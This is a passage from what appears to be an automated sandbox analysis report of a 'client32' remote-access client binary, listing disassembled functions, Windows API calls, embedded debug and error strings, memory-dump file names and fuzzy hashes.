Instruction Fuzzy Hash: BC11C672E01108AFDB10DEADDD45DEEB3BCEF99614F00816EF815D7244EA71A914CBA1

Function 1110B550 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1110B58F

Strings

Error Code Sent to Tutor is %d, xrefs: 1110B575
Error code %d not sent to Tutor, xrefs: 1110B5E8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
API String ID: 2102423945-1777407139
Opcode ID: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
Instruction ID: b43b366142eeca4acab724c68f0e90673ee899940c55183fb17260b92f7d2313
Opcode Fuzzy Hash: cb457852222b3d9b2bd104c4c917ff69952e9b88395c3a1b0ae6dfef815d539e
Instruction Fuzzy Hash: 0911A07AA4111CABDB10DFA4CD51FEAF77CEF55308F1041DAEA085B240DA72AA14CBA5

Function 1100B690 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

Strings

Error. preventing capbuf overflow, xrefs: 1100B6C6
Error. NULL capbuf, xrefs: 1100B6A1

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID: Error. NULL capbuf$Error. preventing capbuf overflow
API String ID: 0-3856134272
Opcode ID: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
Instruction ID: a4a4ce9073261333e851eebcc79e1773aa66005037fae8e918fe6f1657af3004
Opcode Fuzzy Hash: a723116aa68a4b999a3597d1cc0fccb57ed2d6ff5a333340ea9ad9601b026ece
Instruction Fuzzy Hash: C401207AA0060997D610CE54EC40ADBB398DB8036CF04483AE65E93501D271B491C6A6

Function 1112D6E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000001,WTSSendMessageA,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D6F4
SetLastError.KERNEL32(00000078,00000000,?,1113A569,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 1112D735

Strings

WTSSendMessageA, xrefs: 1112D6EE

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: WTSSendMessageA
API String ID: 199729137-1676301106
Opcode ID: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
Instruction ID: 5748faf58fc4c309978bb3964bb976d1af77d24f32d17e8bed4b3b40d6b81985
Opcode Fuzzy Hash: 7fb74c84802ba5a444731fdd007d56646f6016a01965a233a038b3bb232e74b6
Instruction Fuzzy Hash: 7E014B72650618AFCB14DF98D880E9BB7E8EF8C721F018219F959D3640C630EC50CBA0

Function 110D1540 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

wvsprintfA.USER32(?,?,00000000), ref: 110D1572

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\NSMString.cpp, xrefs: 110D1585
pszBuffer[1024]==0, xrefs: 110D158A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
API String ID: 175691280-2052047905
Opcode ID: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
Instruction ID: b89aa90761fb3a94205c41d70d04c41302f16292cd1454487622bd2b1eadc16a
Opcode Fuzzy Hash: 7c0d153cab71b8fe9f1bfbcba2addb4273ace9702d0da0492f16544c7bd503bd
Instruction Fuzzy Hash: 0EF0A975A0025DABCF00DEE4DC40BFEFBAC9B85208F40419DF945A7240DE706A45C7A5

Function 11015030 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00001006,00000000,?), ref: 1101509D

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11015049
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11015044

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
Instruction ID: f09b96a616f6a33d867b0b5af4e6941d1959c252ec7f828cb2a239631c18db6c
Opcode Fuzzy Hash: 815180139f2bb1a06bb201446d8668dccf0e5584833ed039e0ec19942fc9e912
Instruction Fuzzy Hash: 1701A2B1D10219AFCB90CFA9C8457DEBBF4AB0C310F10816AE519F6240E67556808F94

Function 110D15C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\NSMString.cpp, xrefs: 110D15FE
pszBuffer[1024]==0, xrefs: 110D1603

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
API String ID: 175691280-2052047905
Opcode ID: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
Opcode Fuzzy Hash: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9

Function 1109D810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA,00000000,?,1109E6BC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D824
SetLastError.KERNEL32(00000078,00000000,?,1109E6BC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D84D

Strings

ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109D81E

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
API String ID: 199729137-262600717
Opcode ID: 7111d195e66c423c04a8cdecdaa052cea34c6f9f6774aeedc819551a2fab5bee
Instruction ID: a7eb98fa6670c8ef5a6ef58352877086b50851194238c89ec414a48c6dd1b06f
Opcode Fuzzy Hash: 7111d195e66c423c04a8cdecdaa052cea34c6f9f6774aeedc819551a2fab5bee
Instruction Fuzzy Hash: 2EF05E72A41228AFD724CF94E944A97B7E8EB48710F00491AF95A97640C670E810CBA0

Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetPropA.USER32(?,?,?), ref: 1115F395

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

p->m_hWnd, xrefs: 1115F372
..\ctl32\wndclass.cpp, xrefs: 1115F350, 1115F36D

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcessPropwsprintf
String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
API String ID: 1134434899-3115850912
Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2

Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110151F9
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5

Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
SetLastError.KERNEL32(00000078), ref: 11017409

Strings

QueueUserWorkItem, xrefs: 110173DE

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: QueueUserWorkItem
API String ID: 199729137-2469634949
Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0

Function 11029790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

CreateThread.KERNEL32(00000000,00000000,11027530,00000000,00000000,00000000), ref: 110297DE

Strings

*TapiFixPeriod, xrefs: 110297A7
Bridge, xrefs: 110297AC

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateThread__wcstoi64
String ID: *TapiFixPeriod$Bridge
API String ID: 1152747075-2058455932
Opcode ID: 3080b396092eeda8920bad3614523d6238ebb4cdc89e739b7f498256d61953c6
Instruction ID: 741f43c1c8d280c886d6f15773e052eeed2c6ce1e0fea61ed055b6fa2ceaecb0
Opcode Fuzzy Hash: 3080b396092eeda8920bad3614523d6238ebb4cdc89e739b7f498256d61953c6
Instruction Fuzzy Hash: 24F0ED39B42338ABE711CEC1DC42F71B698A300708F0004B8F628A91C9E6B0A90083A6

Function 1115B8C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetWindowTextLengthA.USER32 ref: 1115B8C3

Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
Part of subcall function 11110230: _memset.LIBCMT ref: 11110262

GetWindowTextA.USER32(750A670B,00000000,00000001), ref: 1115B8DD

Strings

..., xrefs: 1115B8EB

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: TextWindow$Length_malloc_memset
String ID: ...
API String ID: 2795061067-1685331755
Opcode ID: 713777570d7c9697d218dfe7d24bc4d67ffae7820faad57aa0902fa453d29927
Instruction ID: 4b1d5b0fb85ecc65756fa04cbc49f4114121db69e5f1a8b46b9f358c176aa325
Opcode Fuzzy Hash: 713777570d7c9697d218dfe7d24bc4d67ffae7820faad57aa0902fa453d29927
Instruction Fuzzy Hash: A5E0E565A041965FC2404639AA4898BFF59FB86208B044430F0B6D7105DA24E40987E0

Function 1101D320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
SetLastError.KERNEL32(00000078), ref: 1101D351

Strings

